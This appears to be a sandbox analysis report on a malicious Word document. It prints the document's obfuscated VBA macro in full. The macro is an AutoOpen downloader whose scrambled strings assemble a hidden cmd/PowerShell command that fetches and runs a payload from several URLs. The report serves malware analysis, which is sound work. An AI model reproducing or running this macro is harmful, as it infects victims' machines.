0037e6079060778b28b892eb8dcca7e28ca36f26a4f36d8dc53838d6d722b318

Sharing

Copy URL

Twitter E-mail

General

Target

0037e6079060778b28b892eb8dcca7e28ca36f26a4f36d8dc53838d6d722b318
Size

124KB
MD5

b6e13c6a1d437ed02509be01dd334983
SHA1

a12ee91c820278590d58f0f846067992c1aa1053
SHA256

0037e6079060778b28b892eb8dcca7e28ca36f26a4f36d8dc53838d6d722b318
SHA512

8bfc1ffaaa45a8d7f6add5c51e7d1e8e62c95b71b7f76905e3a497f9957227991cd7eef477bc073483d375a3dadaef46d2d7e7376ed170a636fcd194b5836cba
SSDEEP

1536:mptJlmrJpmxlRw99NBq+a9Mctk0bARn03mhE7M7L1HbCmnrlL8gfvQ:Kte2dw99fBcTS03r7UL1HempL8gw

Score

8^/10

macro macro_on_action

Malware Config

Signatures

Office macro that triggers on suspicious action 1 IoCs

Office document macro which triggers in special circumstances - often malicious.

macro macro_on_action

resource	yara_rule
sample	office_macro_on_action

Suspicious Office macro 1 IoCs

Office document equipped with macros.

macro

resource
sample

Files

0037e6079060778b28b892eb8dcca7e28ca36f26a4f36d8dc53838d6d722b318
.doc windows office2003

XjfLisDjucS

1

Attribute VB_Name = "XjfLisDjucS"

2

Attribute VB_Base = "1Normal.ThisDocument"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = True

7

Attribute VB_TemplateDerived = True

8

Attribute VB_Customizable = True

9

Sub AutoOpen()

10

Dim LiHOou(1)

11

LiHOou(0) = Mid(UafDKY + ZZDrUlncEhwjZXsjZtQ + koPjaj, 924, 20) + MidB(riQRJavX + NljuDAArwjJPhVDJvHjA + pOljGdW, 581, 498) + MidB(HUjafiJw + SjJcEsNcjktMNlPVNfpYIZ + jQdXBc, 2, 441) + Mid(GBlInzb + ISoPvXzCdKADDZwJjRMq + ckkErrzu, 232, 849)

12

Dim YAAwfA(1)

13

YAAwfA(0) = Mid(cqNBUinK + GOzNIWMGDQZfkWohNpJE + ZfzDou, 640, 259) + Left(BqKsij + ZYCLdfJzdIGzrjqNC + iMlQU, 413) + Right(DdQbfRTN + uhvEFnqiTInVPpqZM + vCZipWiq, 460) + Left(tIwNiGzt + snPIvWPbopKHlsizMrvnzcN + LjbTf, 11)

14

kWOmnIjtktpw (KeyString(iAYfz + bCzQiO + 9 + 14 + 44 + ivwbic + stLlNFrL) + ZQJKmOz + ZmUZd + KeyString(PQwcLYP + mmIIVLl + 10 + 16 + 51 + piJUJhiw + AYTisipb) + dSEYjani + ElNhAZ + tDsPmEqKVsi + jlLhSYdjl + qUTzAhjPhjp + wMJmzkP + iaWKjaaLVBw + LVdUUMkFd + WuzOP + wjALUzf)

15

Dim RvwAPf(2)

16

RvwAPf(0) = MidB(NPsMWi + iUFDAzcGAtMwEcZOF + uqLkBz, 55, 398) + Mid(udqfa + USwuOmWSEokzQBbOsPwcz + oSTqfd, 621, 599)

17

RvwAPf(1) = Left(JTfDpRU + kiosBaLDiYpqwEzq + ESWOS, 934) + MidB(Czbhi + zZSPZRcAwKKpFlWEjMRii + AAjwIQ, 154, 928) + MidB(jbzsbRC + mDFRiKiUhhvjlbUXotC + GlCXL, 94, 904) + Mid(arJvj + zmnPRjwpbzzidOkKsvnSQ + jJtCVs, 353, 477)

18

Dim TtqDT(1)

19

TtqDT(0) = MidB(SOYiTpd + SbhuzTSoNUbczENmzwLkc + IvujUT, 437, 237) + MidB(RwQAaMPF + pPUXirdlGrFJWjEsB + aGtmzl, 426, 690)

20

Dim iXXdWt(2)

21

iXXdWt(0) = MidB(KECczWzv + wVoTmNMfzMBHsojSRFHM + BEIYlJn, 77, 990) + Mid(lKlJR + kdJwKAVPcPnpIBJEHZpZz + TqdwJzPZ, 545, 167)

22

iXXdWt(1) = Right(uHDDu + LIzkiAANJvELoOhQTPYQ + DjOwEVuO, 163) + MidB(TGzzImjP + RQfZYdrZnrTqaQinApDr + XFTKcs, 6, 972) + Left(PiWfWQX + vAPYcWBcjPOMBuKj + rVCpFCtw, 339) + Mid(UhfNHj + GrYRZWqiibGqmfNjXU + Kwzur, 489, 987)

23

Dim tjbtbW(1)

24

tjbtbW(0) = Mid(bsaRGLpk + cKMjvoNiviFKMMZE + NDAaMpJz, 655, 957) + Mid(SHmRNnBE + FNVlYHuzjXIPGMjfNwzSJ + YvzlDNjV, 959, 743) + Left(RBFiijZ + fEGERZAvuMvdjddJbt + BISiIN, 284) + Mid(fCsqshl + ZprsfnRiECPhiFvzus + IbPbrIIv, 840, 411)

25

Dim PioWp(2)

26

PioWp(0) = MidB(kFzlhLH + YIDKTWczmvkFHnHUfK + hDiKo, 621, 27) + Right(DaTJUfn + pWCRzwSjuDmTEWGlMoT + JjinVkHT, 547) + Left(RBQEDM + GuzkqEwZCfNWHSAKzv + KoOSDFC, 653) + Mid(SstKwo + liRwRznIlDBYEUvbQBsWUf + iUzWL, 123, 629)

27

PioWp(1) = Mid(SNXPY + QizuOXiVNoPsLWwPTLP + rvQsaXMr, 732, 920) + MidB(jAoGlbWz + QsVwBSvlBmEHqvcBw + GHkVHIik, 870, 883)

28

Dim TiJdf(2)

29

TiJdf(0) = Mid(iJjVz + LnmmtovjRPLazatmiDw + TiqDkY, 121, 346) + MidB(zVJFbH + wsOTlDAYbLarUSKzo + KzpEA, 103, 998)

30

TiJdf(1) = MidB(fBfwDD + mwjziGwEdomRJoNQijDzAS + YlQnRSM, 204, 793) + MidB(fqsAS + SAVNSWmVRjhVaYTRq + EzzlcB, 502, 736)

31

End Sub

32

33

XpzIKKTGQiwv

1

Attribute VB_Name = "XpzIKKTGQiwv"

2

Function dSEYjani()

3

QGhAKfV = "d \/ // //" + "// / \ / /V:" + "O/C" + """" + "set ]}*~=027a 0" + "72a 07a2 0a72 207"

4

ZiKwMnYW = "a 2a70 0a72 270a" + " 72a0 7a02 a" + "027 a207 02"

5

Dim jqzRY(1)

6

jqzRY(0) = MidB(tQiQXv + COZOzUwvOSWwXoiiun + CtiHaoHO, 488, 205) + Left(NQNZEMuC + GSWRGpNrPBWWwuHnzt + YlGaJd, 653)

7

Dim iREfn(2)

8

iREfn(0) = Right(YwBqjd + AmktXivcbWUGncpsK + YSjAZKiX, 742) + Right(YZbroTj + cEQTOiONtlJYLOWEJRE + liQfw, 777) + Right(AaNUB + rSPJtZYNMYbwcAEFijSMS + ZJwwuR, 3) + MidB(qBuvm + CSXNZjzpEviFZkVzOBPRH + PKCdT, 374, 409)

9

iREfn(1) = Mid(tvMwqK + pVVinEKamzhmmMToTM + JHJMCYX, 172, 83) + MidB(clFhb + StjXQdsilWVJwEWiYCm + tIfYiji, 851, 298) + Left(qvmqfTXw + iPKXttKBvfqDdIwsGiGnCOz + wEfoRrL, 870) + Right(lnTvO + zsIihzFiIcbHTiwwQrZM + dSOFmj, 847)

10

Dim ownPlI(2)

11

ownPlI(0) = MidB(ZMTGzqu + ISnODpuwjAkJXCiZh + lZHZh, 940, 344) + Mid(MhAVPFjl + UmchdubKuIULGwjdiscX + ViOtSTzp, 690, 634)

12

ownPlI(1) = Left(rifFm + msVuYjqHFErOquNRRaLi + XXWczZ, 126) + MidB(zvAkqJbq + fpJSwWQVRFaNtUAAJfzzY + HfWHpkWu, 931, 703) + MidB(aFhhl + YhGPpzHfEhrlbzPNbVESw + HtvcwMV, 761, 356) + MidB(PjKiv + OtcdcqwLAPUPKjNuDFVVwI + VoDtZO, 539, 649)

13

Dim uZlXQ(1)

14

uZlXQ(0) = MidB(YtbYSw + aaFiaGTPcojcSiRIIHC + STPsGRTM, 93, 639) + MidB(sjinMhBX + uFLPTBnXYaNQHrwJbbvBq + mUvZBb, 811, 545)

15

czcPzz = "a7 a702 720" + "a 7a02 72a0 7a" + "02}207a}a072{027a" + "ha270ca720t720aa"

16

sNkinziXp = "a702c20a7}720" + "a;027ak2a07aa" + "702e072ar7a0" + "2b270a;a720J20a7i"

17

iCtWNk = "0a72W27a0$207a 2" + "0a7ma270e2a07ta027I7" + "0a2-07a2e27" + "0ak072ao20a7va7" + "02n20a7I072a;07"

18

ZzWFn = "a2)20a7J2a70" + "ia720W702a$7a02" + " 27a0,20a7Ta027D02" + "a7v70a2$a072(20a7e0"

19

dSEYjani = QGhAKfV + ZiKwMnYW + czcPzz + sNkinziXp + iCtWNk + ZzWFn

20

Dim fLJYq(1)

21

fLJYq(0) = Right(XiuFTrNt + kfShzacOrAhGOJATIDwLrS + VzLAkFz, 381) + Right(ailhJUz + bfvBENZClUbOizGQQcJvBnNR + tiLsdrz, 500) + Left(mLDHh + LDnasIiMRkrvqavH + lnzjUDE, 98) + Mid(NNlCO + BVDKQNfhQqUaiTZQ + YGEdoQWj, 559, 789)

22

Dim ZumFZV(1)

23

ZumFZV(0) = MidB(AmmNkvp + ScwGGcOjcJqzEbJRoZtE + tlTrs, 857, 512) + Right(LMjpTSXG + EuBiLDMrwJYXvEvHojiGBt + jkzQSAL, 971)

24

Dim ERzQF(2)

25

ERzQF(0) = MidB(mjjRMsp + wRJWajqTjJzrZTuqChi + Imdjz, 314, 515) + Mid(zmaDRnY + MZwjvKwtzzQHBOoDGWo + NtmJKBH, 345, 537) + Left(SKZrSk + dZVqYACzVTHNVBXps + hoEsIrpw, 696) + Mid(RbLrDNJ + HwIvwwwDvvBfnshlLNClzfGr + zJfjsik, 624, 183)

26

ERzQF(1) = Left(umHob + oSKShRzFKKPrGulPRmFHAb + QbvwVFU, 68) + Mid(fcOmHd + uCCANPMIAiLwjjKJOpJ + KEMJA, 598, 590) + MidB(fhifQOj + wTUYKffFzTLjkqICuLdVG + JNDQvdV, 608, 254) + Left(muYdVZh + wzDfaFwzTwOujbpBqpA + RDOdQqE, 774)

27

End Function

28

Function ElNhAZ()

29

Dim zYZCqI(1)

30

zYZCqI(0) = MidB(sdnmzc + vPjwtufwDNnziHIPAbbWJ + rOsAUvQc, 314, 886) + Left(qCtHFmv + NjAirNGTsZRBZwjRXV + SbRMGTWk, 279)

31

Dim InjAC(1)

32

InjAC(0) = Mid(mpolGacw + VoAozdHZhqXMUonTHijT + ZmzdY, 774, 391) + Left(cSrOK + tcFwOrolmpiwUmhXqfdA + bKTdcZ, 540) + Right(pDORs + IslwpzbnFhnUXPbMSXLJNNVr + GUpbvWl, 288) + Left(biffWso + ZbCrEiXiYlUHqCrMYAiMStL + fmUYjJLJ, 84)

33

fLPFBjjkBzw = "27al72a0ia270F072a" + "d70a2a7a02oa702l2a" + "70n27a0w702a" + "oa702Da207" + ".a207C0a27T207a"

34

NHjfTNNYz = "r27a0$a027{7a" + "20y270ar2a70t0a27{" + "2a07)a270N2a" + "70K20a7ra072$a072 70" + "a2n27a0i0a72 720aT"

35

bAiiSTjYiY = "0a72Da207v720" + "a$a702(a702h2" + "07ac027aa27a0e0a27r" + "a027o7a20f27a0;2a7" + "0'702ae0a27x2" + "7a0ea270.a270'"

36

ElNhAZ = fLPFBjjkBzw + NHjfTNNYz + bAiiSTjYiY

37

Dim SGBKEw(1)

38

SGBKEw(0) = Mid(FGSKuhZW + rGHtTUGPvKulljTkGO + fOwQIIK, 413, 269) + MidB(WskZmht + EhKUzlJFlwBcfVDIwEa + BwjAGh, 64, 259) + Mid(YwDdQWw + cjitOJRdkzdilsEJuXi + wEcbrml, 987, 900) + Right(lTCSqM + cSCuNKNRpOswwJjSZqw + UQHzBmS, 646)

39

Dim frVdiA(2)

40

frVdiA(0) = MidB(BvNoAdhI + CAzkhDaJmzHLYlibFiW + zXNcLd, 728, 256) + MidB(FUiuKSC + iztjDIbshzvfAinKpfAkaaFM + YJDBfRRD, 760, 204)

41

frVdiA(1) = MidB(lmfkoZU + zdErLPTJwwhBtuzjQj + iFuOEqm, 598, 837) + Right(YjzJUjC + MYDjKHqaljYdwamLdXTEi + sukfz, 263)

42

End Function

43

Function tDsPmEqKVsi()

44

PwjGLZbQF = "7a02+0a27i0a27z072ai" + "a207$2a07+02a7'20a" + "7\072a'702a+72a0ca0" + "72i072al720a" + "b027au2a07" + "p02a7:27a0va702n702"

45

Dim RtKPQ(2)

46

RtKPQ(0) = Mid(UKfRan + IKuqiSUZwDLMhkkrjD + BsRipC, 64, 817) + MidB(viInRac + kSNVNpwjpwpCJsRzdRWGki + OtTKP, 645, 565) + MidB(oXDpCEWA + tVPuTIdVOMdmwEMfhHZ + EaNJaNzF, 258, 879) + Left(wzAClLU + KkHAdzKpjTbVqTvvOHPtY + FMdvvEu, 154)

47

RtKPQ(1) = MidB(GIzNpjYM + dIHHRZliuritwstl + NwDoKzh, 485, 455) + MidB(VGwwEVd + IdwwYStrriboWDSHSr + DLNjG, 941, 872) + Right(GlYkwF + DOhjNEhjkACWMmwmKjnWzUO + wjNwC, 285) + Left(iapGjza + TtuwbOCSIQrkMilAWCAH + RvFji, 685)

48

Dim FAUbE(1)

49

FAUbE(0) = MidB(LfwFwm + qXCOapTlzpKTwlEjiLiH + iLWDBw, 445, 451) + Mid(IcVmVP + iPMwOtVuFPCMQcdTPjzRmm + wESLPiu, 555, 198)

50

idCUBoH = "ae70a2$2a07=7a02J027" + "ai0a27Wa702$2a07" + ";2a70'70a262a705" + "2a071a270'2" + "07a 07a2=a270 02"

51

wbUJiIsw = "a7ia027za2" + "70ia207$027a;a" + "270)2a70'a027@0a" + "27'7a20(20a7t2a0" + "7ia072l072ap2a07S"

52

lEiobNZRnm = "072a.7a02'7a02G" + "072af270a8" + "2a70/a270o70a2r0a72." + "702aa07a2c20a7i20a" + "7t07a2pa70"

53

tDsPmEqKVsi = PwjGLZbQF + idCUBoH + wbUJiIsw + lEiobNZRnm

54

Dim ciVDRH(2)

55

ciVDRH(0) = MidB(szVus + zfzaLjWcctzXSwHjrhOv + IjkziXT, 391, 253) + Right(MbZQLLsb + GkFhXLDkkjzvCXtEafKW + WhQfV, 418)

56

ciVDRH(1) = MidB(WBviRLk + cLNPjWiowWzcPcAFvY + PVYAEB, 120, 658) + MidB(PhKcqp + AhWziuFhpKfMsOtIVLdhQC + ODnlKu, 912, 448) + MidB(SrdvWmRX + XTOiwpoXzGuzicDzkQUh + CiaorQt, 270, 473) + MidB(oJodFHzh + rwEsKNEpCmKwPzjjM + rwqSOWf, 189, 409)

57

End Function

58

Function jlLhSYdjl()

59

ImBvT = "2o72a0a720" + "ar2a07b20a7i2a70f" + "7a20.2a70wa"

60

Dim KhWwh(2)

61

KhWwh(0) = Right(JjnIdK + pHTzZrFHCrzAjmsqkVs + jrWrDnMI, 393) + Left(CCCsQtcO + EUlDGWkTEwDTRZBUpii + dikzaqt, 586)

62

KhWwh(1) = MidB(bWlnw + oKsswikwUauEQCacmk + KSuKpL, 675, 718) + MidB(NuTLq + zodVSkFCGjMUfrhaEYuzM + rqNFEM, 929, 613) + MidB(PzsioHnF + kXWzcdaXFoRmOpwBXQos + torPQGu, 249, 210) + Right(UNcbwW + HwLwqZSDcIwibVjKHwtEb + ubTaau, 627)

63

Dim fisBpz(2)

64

fisBpz(0) = Left(kCoqtstm + AiNujSfrXdBNnpAwWU + CUYWhBj, 499) + Mid(ijdal + jKGsNpZXFCtpqzKaKOld + pzijoNEC, 778, 749)

65

fisBpz(1) = Left(qpljz + jjwAsqiPntzjwjKqjsw + PfmIV, 786) + MidB(cibQrw + KztOvpiFRCZGZChpMDWtVMb + XiflXzZu, 99, 553) + MidB(BjMDmC + ftauMpnDYBTTQlRBJAI + qLKXJq, 671, 200) + MidB(SdElYw + qhamGVwRVAABXQNPSdNp + zOEMA, 857, 95)

66

TisYU = "027w20a7w20a7/02a7/" + "02a7:0a72pa720" + "ta720ta270h72" + "0a@072aX072aOa02"

67

hUnoRvjw = "7ua702J72a0i2a70D27a" + "0/0a72ma072o20" + "7aca270.072apa207e" + "7a20i20a7h0" + "27ag027an7a02g027a"

68

jlLhSYdjl = ImBvT + TisYU + hUnoRvjw

69

Dim pfttEN(1)

70

pfttEN(0) = Mid(GoAQtrXN + szITQlSJmLhXUzfKXr + DnpTwtM, 306, 165) + Right(OZaWPI + EOhYfZsrsDIXkjaRPY + DSqLzt, 567)

71

Dim vmDFp(2)

72

vmDFp(0) = MidB(YNKQSu + jXhqHdrjGHuiQcvFVaAvau + bhlhTrVU, 398, 457) + Right(oDCTw + fHkORfpQjcGvsnQZoDNwIXn + RXhzsQ, 692) + MidB(SUCizFns + OAnAUZZSKcrdzXzfOfIFZj + KEIIPG, 461, 332) + MidB(XMXwrRX + qCGZMoNkFuNRkUKBN + iGvVm, 140, 317)

73

vmDFp(1) = Left(iLInUDfv + DnLWQWVNWHqlUAd + FmwPM, 36) + Mid(ijpPh + SXjiPQlQiMKSCBDSzRqv + zTnhhs, 774, 815)

74

Dim zQwcl(2)

75

zQwcl(0) = MidB(jjzqqAi + LONPbbZPwwVjqYjCmCa + iKPKYGT, 90, 60) + MidB(ZdtrVqi + VOwqaWhRrllhkhRrLdtSq + rPrhvTQt, 143, 384)

76

zQwcl(1) = MidB(kBYBYL + ssMaJbrwbvGhbZwvRUo + Dnipnc, 401, 137) + Left(GwDRXU + ifYHrIGbaPqbwWWwBK + oXUUf, 289) + Left(boBFzpw + SjAurrCjEvBXbYjjWo + TwnCZwSJ, 503) + MidB(idhMwjj + KNaEMtEYMZhbpDpLEQvUb + dTMmDnWu, 634, 128)

77

End Function

78

Function qUTzAhjPhjp()

79

dcMHSIz = "n027ao7a20c" + "70a2n0a27o0a27s" + "a027o2a70ha270k" + "072ag027an2a70o7" + "02ata072/027a/0"

80

Dim MOEzj(1)

81

MOEzj(0) = Right(laRnRU + hrIkdqVdqHwkpCRXNsBpZc + OwcUku, 788) + Mid(OfuVrkQ + WpwXzParFfCicGhLWWB + QDswvWHk, 670, 968)

82

Dim FCMWOJ(2)

83

FCMWOJ(0) = MidB(VVXFF + AWqpqSMsdFpONcBTShM + RYLDbw, 958, 252) + MidB(wXnaLWs + sIUiIrvEmbwYYRGJfuj + jzGaBqwZ, 734, 855) + MidB(wtDLU + aVlIkPCtjPZMQblhtNq + wzPbY, 66, 954) + Mid(mSXupVLz + qWSdsUvanIfkSbMaVNlEiaz + VPVuQ, 200, 231)

84

FCMWOJ(1) = Mid(TWGcLWX + hETdiYbSESuQrWL + OZHojU, 548, 386) + Mid(OjzTQ + shKWprHsPcqloVrHzf + jEjQpl, 714, 694)

85

Dim HiiHr(2)

86

HiiHr(0) = Mid(zSqFAdH + ZicICwTaSFjHfzbi + wdRZzMD, 168, 672) + MidB(DmMGHWM + LjYUHhjZCCdDWaiFtuK + dXfXAXaO, 545, 575) + Left(FzSPcU + YwAPlGwHIlApjqkiCboA + IuNQp, 321) + MidB(LTfWQlu + GTsUdYGNPmjEkzcLjXSr + dNLNma, 770, 536)

87

HiiHr(1) = Left(hjjfWGi + nvHihCJirPnbhKvUbowEP + tjwpco, 816) + MidB(dWfdRj + kZuFzjLLOAMojQCWMtPa + JScfSCr, 443, 862) + Mid(ILuvQdRa + iliwMONMUzzUDjsMIp + BYFIaw, 310, 966) + Mid(Gajzj + iRjzqLrDNwYOjpmaHGmJwW + NQmFAnYi, 449, 297)

88

DmRAi = "2a7:0a27pa207t702a" + "t27a0h7a02@20a7y027" + "a507a2O72a0Ja720S70" + "2aX20a7E7a02da20" + "7/72a0ga072r072" + "aoa702.70a2k2a"

89

Dim qwMuh(2)

90

qwMuh(0) = MidB(LjfXNsk + kEUtzvXdHUTkCZKQkw + zMnjXViC, 738, 84) + MidB(tkNUjApQ + lQQuVoiSHIPVjYBvEitP + RLqjjIMQ, 327, 529)

91

qwMuh(1) = Left(cAuUSl + iOhLIcnUzrAvEDnjzvzEFm + BAkQIsiM, 50) + Left(YGUrvRk + YwRciCufJbZwUkjiIQr + MPciEDnU, 298) + Right(FjHlGU + sCFZYiWhBOEhQPZtpb + JJLjk, 562) + Left(nhKIvGq + isFTAkpKqVhbuFwPNCmhjZ + WmXJZV, 951)

92

wcCpE = "07a72a0l072am072a" + "e270ata702n720ae72" + "a0k072aia072t27a0a2" + "0a7b702a.2a70w"

93

qUTzAhjPhjp = dcMHSIz + DmRAi + wcCpE

94

Dim nIZWW(1)

95

nIZWW(0) = MidB(cvLnFlz + qtvKVuZSXshwmVFInpr + vHdPkQ, 15, 474) + Left(fELYutjM + cEfjhAjjXkzNiPNQCWTizjZ + KPEcnipq, 539) + MidB(jhUhbNf + JjdZkBbWhDHZbSILfo + VbsUClG, 689, 14) + Left(odlfsmGf + qaJvzGJFLskvHzZXPwCYh + pnQZYIEr, 594)

96

End Function

97

Function wMJmzkP()

98

Dim TXBIYj(2)

99

TXBIYj(0) = MidB(zsPjhotu + IfWJiQNVSobOwOdizkRIL + LEQuaaIr, 579, 352) + MidB(skXLL + VdSViQLVjrXlEjza + TXSviE, 705, 963)

100

TXBIYj(1) = Mid(GjFjPt + VJPnLmuCHjrNsCGzZEU + vGlqGb, 414, 221) + MidB(FiwfMf + CdRiLVMdJtJdAiEBDCalUu + AuXuTYi, 345, 39) + MidB(uPstz + nlEEvnizTbsNpwSGOZk + cHfKlLJ, 557, 483) + Left(Mbvwj + bPqJwYjabrzsCqVbzslJw + jBOCTWbj, 174)

101

Dim DJXkG(1)

102

DJXkG(0) = Left(zDCSSDzi + YAqhZwsjNctiAwofVdP + WiizsRL, 163) + Left(TwsoiKfN + UEYBnHJDlzJmEQviOCUdo + hHKUqQp, 195) + Left(JjKwJB + sKLndmuiLAAakUzwiuj + nshkljE, 18) + Mid(vWWtiXaH + JQrZLEmDWjMpkFJwC + lbozjTVb, 157, 750)

103

Dim Cfzij(2)

104

Cfzij(0) = MidB(DiihAFhI + oBczIQVpnkjDcvJGSTWBhtIL + TqAzvq, 8, 122) + Left(PbpljPXf + qzLQmcSuDzFPZbwHlvCibc + kSRWdIT, 482)

105

Cfzij(1) = Left(jNTYALY + MQJmjXQroUjnvhdhWwwA + zSoNur, 127) + Mid(iOafli + bkzvvSVqiqYNPPjYjDzw + VRjGB, 830, 59)

106

Dim UPIVD(1)

107

UPIVD(0) = Right(WaJQIE + YKFFVpiotaBlkSrKvAtz + QjWnzt, 317) + MidB(iqlzvOp + cdzhmHcCuTzihFIHBoz + ACbFqLvF, 503, 456) + Left(ZiuPVUrV + DjIPpFhZdTAhkfMwOXHniHX + fTHoQNwv, 939) + MidB(pXApuf + KjIiBTPvtiHotOVfjTl + LVJrWR, 855, 973)

108

picjnt = "7a20w07a2w0" + "2a7/720a/7a02:07" + "a2p07a2t07a2t720ah" + "20a7@720aaa270Y072a"

109

Dim WvOrtR(1)

110

WvOrtR(0) = MidB(JVNVGZ + mcNkFwjlKwGHkjYtNUPok + lztCVY, 910, 87) + Right(DqYZAfF + zHYlUojdEWoduwpjoY + SCprA, 383)

111

Dim tdoJr(2)

112

tdoJr(0) = Left(sEDvXp + JQOnPlLiciPaiKWuklZRF + mrkJp, 154) + MidB(CccNUUH + hItrOGkAuJwIZMFub + bOqcUUzB, 500, 555)

113

tdoJr(1) = MidB(kzULYi + oNqMSdoIONqhiBlolnw + EQNLEBj, 223, 935) + MidB(NXdJqzJt + dmrPpJuslpsKIJjHiBt + UGYczliF, 184, 329)

114

Dim IGdLR(1)

115

IGdLR(0) = MidB(bJFVFTJ + zpFrqDsfrHVWJcJfBU + bNrkbf, 166, 669) + MidB(lmTaBbEO + ZaPFALLcdaVQVzTQADIz + Wajbhbm, 440, 632) + Mid(zmkPT + fTQWzzclzwwQVdlbBcCo + acjNiBj, 447, 699) + Mid(TAcmE + oajiYJQGsiwciRmqOCwPZ + fBdIo, 931, 438)

116

Dim YzvDWw(1)

117

YzvDWw(0) = Right(osopdB + SNqmrKwOdPDiZPft + RUSaZbj, 841) + Left(zPDWi + HOowpsjBkKPawIZtYLRi + tbPNR, 644) + Right(nXfwicbl + rWcuEraVpHPpfLRRkjCLVm + bwYSmjt, 837) + Left(wXXYrLK + hzmojJrooLGIObzWVf + EMzutMsr, 16)

118

zuPOzTmIjWO = "f27a0470a2ra0276a27" + "0T7a02227a0/2a0" + "7r2a70b270a.a" + "270ma072oa207c027a." + "027at07a2e"

119

Dim PKGwkN(2)

120

PKGwkN(0) = MidB(RpZXH + uzSKOLOwnlrAdsq + vfJcbF, 700, 126) + Mid(aPjBoKEH + DwJJzYNRLhjEOopjJ + YzMVE, 97, 56) + MidB(lZjNzV + DmWpdSuLoZWOtwXMw + NKblvH, 401, 202) + MidB(nMfWDPuf + tQcSLQpPbJDZLNsWmq + hiBsmpi, 550, 642)

121

PKGwkN(1) = Mid(ZwiJZi + vmjkNvwCCIfTrpvVizjw + fKcdES, 769, 925) + MidB(ozwnw + fZYzAiHmPMMfOnhlUOw + jHlBwl, 447, 480) + Right(AZDbf + riDbjfApnFLVihOswGn + nXiNOEiC, 173) + Left(Thtzct + zRNTSjzNmfPLnMBimlE + WLNHK, 273)

122

Dim EPsKM(2)

123

EPsKM(0) = MidB(OnrSzv + vlOEpWwlFGjiwhPNkNCc + RUBjtDW, 208, 311) + Mid(FIzmJS + FduRFBjiHLtIYCtQsB + OASGHP, 513, 514) + Mid(XsFWDvAr + DECGpobkCODVFjZuUHjRzl + CzwPAi, 920, 406) + Right(LRToqKsh + AqmHbzjWnFVSYZnNUZkV + HafRVZQ, 344)

124

EPsKM(1) = Mid(LMqoDj + XspzuPEtTwzQUTWTPBNo + KNYawJ, 712, 206) + Mid(ZnIjPMcU + CwrsMUQzwJEljfSGJN + VurLpDD, 472, 883)

125

Dim PLWjOi(1)

126

PLWjOi(0) = MidB(LppVBb + jKNnFQVzUIrMPMBRYf + bhsbp, 612, 494) + MidB(upWOjEi + AjtVkIOQIAKXihGMoipX + zWZJiI, 428, 344)

127

KFzKtSqzQuq = "a027v7a20l20a7e7a2" + "0v72a0/027a/72" + "0a:0a72p072at0a72" + "ta072ha720@072an" + "a072o207ata072" + "ca720Ja027c2a70/"

128

wMJmzkP = picjnt + zuPOzTmIjWO + KFzKtSqzQuq

129

Dim fraaD(1)

130

fraaD(0) = Left(iFVQdjUi + nbOOXPKzHFcozJYwkNIp + fjmYn, 828) + Left(EaoorHw + GDoCQVBawflsilrJcmJ + rjYhnR, 318) + Right(wCmvEP + XMvDzMwDkPpidTLjzMNIf + ucziB, 544) + MidB(OzVRrXc + hAKrUFztiQfKEPRTEbintz + RBTIUija, 594, 422)

131

Dim WzGIt(1)

132

WzGIt(0) = MidB(EsFuD + aCwNQFGhbZavzkBTszEV + NsKHLGPC, 232, 149) + MidB(RFaTQSi + kHiOVsNLVjYSCzWUJXjps + wtYhmq, 840, 516) + Left(jsqNfoA + DzCYYvKYvARCwqpd + jsZROGfG, 580) + MidB(EqwTuVz + jTidTujnozXCLWGKKQDuN + uNjCVq, 255, 869)

133

End Function

134

Function iaWKjaaLVBw()

135

HXzJWRoRaoi = "207au7a20e07" + "2a.a027a02a7i" + "20a7r702at27a0" + "s0a72u72a0d7" + "a02na270i7a20" + "s702am027a"

136

ziVYF = "ea072t270a" + "s0a72ya270s" + "a027a7a20v" + "a027oa207n72a" + "0.702aw0a2"

137

Dim wwTas(2)

138

wwTas(0) = MidB(jLBfcMRO + adYRKASEOTICIth + jXNFdGLP, 724, 432) + Mid(AHSfp + sTInaVatdTSkWCQTnEuk + dMHCpWT, 960, 920)

139

wwTas(1) = Left(bjmjDF + SDABBkQVIhwicITwDGAUo + vSdjkwb, 967) + MidB(cLFSZHz + SnwdpaHPfRiMMzmlYiWkN + wNjdzC, 599, 489)

140

Dim wonIAr(2)

141

wonIAr(0) = MidB(wvQzfd + MRjvDkViWblDnplsI + XrKSRjD, 948, 642) + MidB(ipNtb + mRidQljrcKuljtollT + jpYkBZ, 806, 884) + MidB(jWjzt + jkoanmRIFTEpzsworqkGBi + EwpmzNBF, 666, 641) + Left(CHBtUWpY + FhzFjtvirrtMlSTnuJjHEmk + mftWsQrI, 741)

142

wonIAr(1) = MidB(HJEuzCJ + bACwlGWZuSwFFwUAvu + ZMfkFoH, 47, 559) + Right(Omdulm + irbfCDnBhJwUdmFVZh + pJhqEdDi, 273)

143

VnnNMYIJEW = "7w027awa270/20a7/720" + "a:72a0pa720t20" + "7at2a07h7a20'70a" + "2=2a07N0a27K0" + "27ar0a72$7a02;" + "a720ta207n"

144

Dim pzhdhs(2)

145

pzhdhs(0) = MidB(UUqDz + IjQMnzlVVMIzupuqdfE + hjLXVSds, 719, 566) + MidB(wzmJq + IUjrIZBIHqUbfHGb + rUWjC, 958, 937) + Mid(jmTtT + oCCwRUlvrwWRfvHQANL + cJAbDB, 188, 736) + Left(SDYTmXi + LBaZccXlCTkdUHUJrHh + kNAqcV, 868)

146

pzhdhs(1) = Right(ntVCjXw + XjnzoGsiCZjQdrLchvQJC + DKSXwKMi, 187) + MidB(mYuzdqq + XQdquWwhHazCihHGOX + RkCqij, 353, 487) + Left(vSnjb + oOwBApnZOvjkiflwrRoOP + bDjPC, 114) + Right(ZJpSRu + qUWpifhqUUlWhTtOkscM + SEWvi, 890)

147

Dim zzussY(2)

148

zzussY(0) = Mid(zYhlsva + wYfiYIjkQbuaIJXB + aVSwtDiE, 250, 444) + Left(nfWjw + lMHHTsNHdjYYYDMfiK + XtzhwhE, 521) + Right(STbSNzGj + bdzFHSSUSwYkNVKOdD + cFlsFp, 259) + Left(SHAtusaj + GsztMqidvSOSWzWZC + swFzl, 817)

149

zzussY(1) = Left(kiDSvjc + CWokdfpaoXsYHAzB + FshzLj, 207) + MidB(ZunzXfo + SBJKCvjciKvjbziHkS + ozOdEFis, 356, 567) + Right(mDvpmOf + pisSOmZhlzWHnRjat + RwslHCoV, 430) + Mid(OwOWKpSJ + rnLfiiChEOtzQdfXLLP + sWwRGqI, 691, 879)

150

